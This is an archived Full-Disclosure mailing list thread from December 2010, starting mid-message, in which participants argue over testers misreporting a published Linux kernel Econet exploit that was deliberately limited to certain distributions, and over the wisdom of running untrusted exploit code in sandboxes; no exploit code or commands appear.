> and simple. *THEN* there's people who don't even bother to read that "Red
> Hat does not support Econet by default". DOES NOT. As in the exploit WON'T
> WORK!
>
> It's pathetic that the original exploit dev has to waste his time saying
> the same thing 5 times.
>
> 
>
> Ryan Sears
>
> - Original Message -
> From: "dan j rosenberg" 
> To: "Cal Leeming [Simplicity Media Ltd]" <
> cal.leem...@simplicitymedialtd.co.uk>,
> full-disclosure-boun...@lists.grok.org.uk, "Ariel Biener" <
> ar...@post.tau.ac.il>
> Cc: "leandro lista" ,
> fireb...@backtrack.com.br, bugt...@securityfocus.com,
> full-disclosure@lists.grok.org.uk
> Sent: Monday, December 13, 2010 4:08:05 PM GMT -05:00 US/Canada Eastern
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
> Please don't inundate me with e-mail because none of you bothered to read
> the exploit header.
>
> The exploit so far has a 100% success rate on the systems it was designed
> to work on.
>
> I don't think this is rocket science.  If your distribution does not
> compile Econet, then the exploit obviously won't be able to open an Econet
> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
> this particular exploit won't work.
>
> If your distro doesn't export the relevant symbols (Debian), ditto above.
>
> If your distro has patched the Econet vulnerabilities I used to trigger
> this (Ubuntu), ditto above.
>
> This was done on purpose, to avoid giving a weaponized exploit to people
> who shouldn't have one.
>
> -Dan
>
>
> Sent from my Verizon Wireless BlackBerry
>
> -Original Message-
> From: "Cal Leeming [Simplicity Media Ltd]"
>
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Mon, 13 Dec 2010 20:40:45
> To: Ariel Biener
> Cc: ; ; <
> bugt...@securityfocus.com>; 
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 

Cal Leeming

Operational Security & Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji

it doesnt contribute to testing, i can assure you there's been enough
'tests' of this exploit.

On Mon, Dec 13, 2010 at 9:32 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Actually Ryan, I'll think you'll find a lot of people just wanted to
> contribute towards testing, as most authors will appreciate the masses
> testing on as many systems as possible.
>
> It's not a case of anyone "showing off", it's simply that a lot of people
> simply don't have time to read the "small print".
>
> On Mon, Dec 13, 2010 at 9:27 PM, Ryan Sears  wrote:
>
>> Hey Dan,
>>
>> Freaking THANK YOU first and foremost. I've been waiting for someone to
>> say that for days now, and was just about to myself.
>>
>> Just because everyone and their brother want's to show off that they can
>> compile & run some software (herp a derp, good job) DOESN'T mean they should
>> immediately post it here. I tested it against an OLDER KERNEL on purpose
>> because I actually read the headers and the exploit worked as expected. I
>> knew that this was responsibly disclosed, so it was already patched on any
>> system that I updated. If you don't have the proper symbols, then the
>> exploit doesn't have the proper offsets, and the exploit will fail. Plain
>> and simple. *THEN* there's people who don't even bother to read that "Red
>> Hat does not support Econet by default". DOES NOT. As in the exploit WON'T
>> WORK!
>>
>> It's pathetic that the original exploit dev has to waste his time saying
>> the same thing 5 times.
>>
>> 
>>
>> Ryan Sears
>>
>> - Original Message -
>> From: "dan j rosenberg" 
>> To: "Cal Leeming [Simplicity Media Ltd]" <
>> cal.leem...@simplicitymedialtd.co.uk>,
>> full-disclosure-boun...@lists.grok.org.uk, "Ariel Biener" <
>> ar...@post.tau.ac.il>
>> Cc: "leandro lista" ,
>> fireb...@backtrack.com.br, bugt...@securityfocus.com,
>> full-disclosure@lists.grok.org.uk
>> Sent: Monday, December 13, 2010 4:08:05 PM GMT -05:00 US/Canada Eastern
>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>
>> Please don't inundate me with e-mail because none of you bothered to read
>> the exploit header.
>>
>> The exploit so far has a 100% success rate on the systems it was designed
>> to work on.
>>
>> I don't think this is rocket science.  If your distribution does not
>> compile Econet, then the exploit obviously won't be able to open an Econet
>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>> Slackware, and more.  This doesn't mean you're not vulnerable, it just means
>> this particular exploit won't work.
>>
>> If your distro doesn't export the relevant symbols (Debian), ditto above.
>>
>> If your distro has patched the Econet vulnerabilities I used to trigger
>> this (Ubuntu), ditto above.
>>
>> This was done on purpose, to avoid giving a weaponized exploit to people
>> who shouldn't have one.
>>
>> -Dan
>>
>>
>> Sent from my Verizon Wireless BlackBerry
>>
>> -Original Message-
>> From: "Cal Leeming [Simplicity Media Ltd]"
>>
>> Sender: full-disclosure-boun...@lists.grok.org.uk
>> Date: Mon, 13 Dec 2010 20:40:45
>> To: Ariel Biener
>> Cc: ; ; <
>> bugt...@securityfocus.com>; 
>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
>
> Cal Leeming
>
> Operational Security & Support Team
>
> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
> supp...@simplicitymedialtd.co.uk
> *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
> *IM: *AIM / ICQ / MSN / Skype (available upon request)
> Simplicity Media Ltd. All rights reserved.
> Registered company number 7143564
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Ryan Sears

Hey Dan,

Freaking THANK YOU first and foremost. I've been waiting for someone to say 
that for days now, and was just about to myself. 

Just because everyone and their brother want's to show off that they can 
compile & run some software (herp a derp, good job) DOESN'T mean they should 
immediately post it here. I tested it against an OLDER KERNEL on purpose 
because I actually read the headers and the exploit worked as expected. I knew 
that this was responsibly disclosed, so it was already patched on any system 
that I updated. If you don't have the proper symbols, then the exploit doesn't 
have the proper offsets, and the exploit will fail. Plain and simple. *THEN* 
there's people who don't even bother to read that "Red Hat does not support 
Econet by default". DOES NOT. As in the exploit WON'T WORK!

It's pathetic that the original exploit dev has to waste his time saying the 
same thing 5 times.



Ryan Sears

- Original Message -
From: "dan j rosenberg" 
To: "Cal Leeming [Simplicity Media Ltd]" 
, 
full-disclosure-boun...@lists.grok.org.uk, "Ariel Biener" 
Cc: "leandro lista" , fireb...@backtrack.com.br, 
bugt...@securityfocus.com, full-disclosure@lists.grok.org.uk
Sent: Monday, December 13, 2010 4:08:05 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit

Please don't inundate me with e-mail because none of you bothered to read the 
exploit header.

The exploit so far has a 100% success rate on the systems it was designed to 
work on.

I don't think this is rocket science.  If your distribution does not compile 
Econet, then the exploit obviously won't be able to open an Econet socket.  
This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS, Slackware, and more. 
 This doesn't mean you're not vulnerable, it just means this particular exploit 
won't work.

If your distro doesn't export the relevant symbols (Debian), ditto above.

If your distro has patched the Econet vulnerabilities I used to trigger this 
(Ubuntu), ditto above.

This was done on purpose, to avoid giving a weaponized exploit to people who 
shouldn't have one.

-Dan


Sent from my Verizon Wireless BlackBerry

-Original Message-
From: "Cal Leeming [Simplicity Media Ltd]"
    
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Mon, 13 Dec 2010 20:40:45 
To: Ariel Biener
Cc: ; ; 
; 
Subject: Re: [Full-disclosure] Linux kernel exploit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]

Again, considering there was no nasty code in there, it was safe enough to
run.

Give it a break dude, you ain't going to get an argument out of me lol :)

On Mon, Dec 13, 2010 at 9:21 PM, Benji  wrote:

> I know in your perfect world nothing could ever break out of a sandbox, but
> this just isnt true.
>
> No more coco-pops for you, maybe some brain food!
>
>
> On Mon, Dec 13, 2010 at 9:19 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>>
>>1. It ran on a one-time server which gets re-generated every time its
>>restarted (which is everytime a testing session has finished)
>>2. I did a *very* brief look in the code for shell code etc, and based
>>on the noise already on the board, there wasn't any risk.
>>3. Even if there was dodgy shell code in there, it still would have
>>posed no risk, because the sandbox is re-generated every time (see comment
>>1)
>>
>> No more troll feed for you!
>>
>> On Mon, Dec 13, 2010 at 9:16 PM, Benji  wrote:
>>
>>> wait wait wait.
>>>
>>> you dont have time to read header notes, but do have time to run code you
>>> dont really know what it does on your system?
>>>
>>> can I send you some code? it's a linux 2.6.* 0day, remote root.
>>>
>>>
>>> On Mon, Dec 13, 2010 at 9:14 PM, Cal Leeming [Simplicity Media Ltd] <
>>> cal.leem...@simplicitymedialtd.co.uk> wrote:
>>>
>>>> Sorry Dan, I did a very quick copy and paste job, without reading the
>>>> headers. I simply don't have time to read the code notes of every single
>>>> exploit released.
>>>>
>>>> I would say that, if you are fed up with being inundated with emails,
>>>> then perhaps you should mark these notes very clearly in big red
>>>> writing at the top of the email like this, for those people who don't
>>>> have much time to read these notes ;)
>>>>
>>>> On Mon, Dec 13, 2010 at 9:08 PM,  wrote:
>>>>
>>>>> Please don't inundate me with e-mail because none of you bothered to
>>>>> read the exploit header.
>>>>>
>>>>> The exploit so far has a 100% success rate on the systems it was
>>>>> designed to work on.
>>>>>
>>>>> I don't think this is rocket science.  If your distribution does not
>>>>> compile Econet, then the exploit obviously won't be able to open an Econet
>>>>> socket.  This includes Arch Linux, Gentoo, Fedora, Red Hat, CentOS,
>>>>> Slackware, and more.  This doesn't mean you're not vulnerable, it just 
>>>>> means
>>>>> this particular exploit won't work.
>>>>>
>>>>> If your distro doesn't export the relevant symbols (Debian), ditto
>>>>> above.
>>>>>
>>>>> If your distro has patched the Econet vulnerabilities I used to trigger
>>>>> this (Ubuntu), ditto above.
>>>>>
>>>>> This was done on purpose, to avoid giving a weaponized exploit to
>>>>> people who shouldn't have one.
>>>>>
>>>>> -Dan
>>>>>
>>>>>
>>>>> Sent from my Verizon Wireless BlackBerry
>>>>>
>>>>> -Original Message-
>>>>> From: "Cal Leeming [Simplicity Media Ltd]"
>>>>>
>>>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>>>> Date: Mon, 13 Dec 2010 20:40:45
>>>>> To: Ariel Biener
>>>>> Cc: ; ; <
>>>>> bugt...@securityfocus.com>; 
>>>>> Subject: Re: [Full-disclosure] Linux kernel exploit
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>>
>>>> Cal Leeming
>>>>
>>>> Operational Security & Support Team
>>>>
>>>> *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
>>>> supp...@simplicitymedialtd.co.uk
>>>> *Fax: *+44 (02476) 578987 | *Email: *
>>>> cal.leem...@simplicitymedialtd.co.uk
>>>> *IM: *AIM / ICQ / MSN / Skype (available

Re: [Full-disclosure] Linux kernel exploit

2010-12-14 Thread Ariel Biener

Cal Leeming [Simplicity Media Ltd] wrote:
> Actually Ryan, I'll think you'll find a lot of people just wanted to
> contribute towards testing, as most authors will appreciate the masses
> testing on as many systems as possible.
>
> It's not a case of anyone "showing off", it's simply that a lot of
> people simply don't have time to read the "small print".

I am not sure that those kind of testers are at all helpful to the
developer.

-- Ariel
 --
 Ariel Biener
 e-mail: ar...@post.tau.ac.il
 PGP: http://www.tau.ac.il/~ariel/pgp.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

45 matches

Mail list logo